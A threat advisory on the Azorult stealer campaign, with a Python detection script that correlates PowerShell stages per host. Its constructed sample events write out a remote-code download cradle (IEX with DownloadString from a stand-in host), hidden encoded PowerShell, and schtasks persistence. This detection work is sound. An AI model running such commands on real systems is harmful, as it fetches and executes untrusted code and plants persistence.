Threat Advisory

Azorult Malware: A Multistage and Information Heist Campaign

Threat: Malware
Criticality: High

Summary:

Azorult, a notorious information-stealing malware initially identified in 2016, continues to pose a significant threat in the cybersecurity landscape. Functioning as both an information gatherer and a downloader for additional malware families, Azorult has recently been observed in a sophisticated multistage campaign. This campaign involves the use of obfuscated PowerShell scripts and memory-based execution, allowing the malware to operate without leaving traces on the disk, thus evading detection by traditional security solutions. The malware, originally available on Russian underground forums, has evolved over time, demonstrating a high level of complexity.


The Azorult campaign unfolds in a series of stages, starting with a zip file containing a malicious shortcut file disguised as a PDF document. The shortcut file, housing an obfuscated PowerShell script, orchestrates the download and execution of a loader in memory. This loader, in turn, initiates a cascade of actions, including the retrieval of additional PowerShell scripts from a remote server, anti-virtual machine checks, and the creation of a scheduled task. The loader's ultimate goal is to communicate with command-and-control servers, extract configuration data, and download the final Azorult payload. The payload, a 32-bit Azorult .Net executable, exhibits a range of malicious activities, from system information gathering to targeting crypto wallets, browsers, and various applications. The entire process is carefully orchestrated to occur in memory, avoiding detection by security solutions.
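The chain above leaves a recognisable footprint in process-creation telemetry even though the payload never touches disk: Explorer spawning PowerShell with evasion switches, a download cradle, a WMI/CIM hardware query, and a scheduled task, all on one host. The following is an added detection example, not code from the original advisory or from Cyble; the stage heuristics are assumptions written for illustration, and the process records are constructed samples, not real telemetry.

```python
import re
from collections import defaultdict

PS_IMAGE = r"(?:powershell(?:_ise)?|pwsh)\.exe$"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Heuristics for the stages described above (assumed rules, not vendor signatures).
# A rule fires only when every listed field matches; the optional parent pattern
# ties the first stage to a shortcut double-clicked in Explorer.
STAGE_RULES = {
    # LNK disguised as a PDF -> Explorer spawns PowerShell with evasion switches
    "lnk_powershell_launch": dict(
        parent=r"explorer\.exe$", image=PS_IMAGE,
        cmdline=r"-w(?:indowstyle)?\s+h(?:idden)?\b|-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}|-(?:ep|executionpolicy)\s+bypass"),
    # loader fetched from a remote server and executed in memory
    "in_memory_download_cradle": dict(
        image=PS_IMAGE,
        cmdline=r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression"),
    # anti-virtual-machine checks against hardware identity classes
    "anti_vm_check": dict(
        image=PS_IMAGE,
        cmdline=r"Win32_(?:ComputerSystem|BIOS|VideoController)|VMware|VirtualBox|QEMU"),
    # persistence through a scheduled task
    "scheduled_task_persistence": dict(
        image=r"(?:schtasks|powershell(?:_ise)?|pwsh)\.exe$",
        cmdline=r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|New-ScheduledTaskAction"),
}
COMPILED = {s: {k: re.compile(p, re.I) for k, p in r.items()} for s, r in STAGE_RULES.items()}

# Constructed process-creation records (Sysmon Event 1 / EDR style), not real telemetry.
# WS-01 shows the full chain; WS-02 is a lone administrator running a hardware query.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmdline": "powershell.exe -w hidden -ep bypass -enc UwB0AGEAZwBlADEA"},  # inert placeholder blob
    {"host": "WS-01", "parent": PS_PATH, "image": PS_PATH,
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://loader.example/s2.ps1')\""},
    {"host": "WS-01", "parent": PS_PATH, "image": PS_PATH,
     "cmdline": "powershell.exe -c \"Get-CimInstance Win32_ComputerSystem | Select Manufacturer,Model\""},
    {"host": "WS-01", "parent": PS_PATH, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /create /sc minute /mo 30 /tn Updater /tr powershell.exe"},
    {"host": "WS-02", "parent": r"C:\Windows\System32\cmd.exe", "image": PS_PATH,
     "cmdline": "powershell.exe -c \"Get-CimInstance Win32_BIOS\""},
]

def classify_event(event):
    """Return the set of stage names whose patterns all match this single event."""
    return {stage for stage, rule in COMPILED.items()
            if all(rx.search(event[field]) for field, rx in rule.items())}

def correlate_by_host(events, min_stages=2):
    """Union the stage hits per host and flag hosts showing at least min_stages distinct
    stages: the multistage pattern, not one suspicious command, is the signal."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= classify_event(ev)
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= min_stages}
```

Each heuristic alone is noisy (administrators run `Get-CimInstance Win32_BIOS` too), which is why the correlation step requires several distinct stages on the same host before flagging it.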

Azorult's complexity and adaptability underscore the ongoing threat it poses to cybersecurity. The campaign's use of advanced techniques, such as obfuscation, memory-based execution, and anti-analysis checks, makes it a formidable adversary. The malware's ability to extract sensitive information, including crypto wallets and login credentials, raises concerns about the potential impact on compromised systems. To mitigate the risk associated with Azorult, users are advised to exercise caution when downloading software, verify website legitimacy, deploy robust antivirus solutions, and employ security best practices, including strong passwords and regular data backups. The continuous evolution of Azorult emphasizes the need for defenders to stay vigilant and proactive in countering emerging threats.

Threat Profile:


References:

The following reports contain further technical details:

https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/
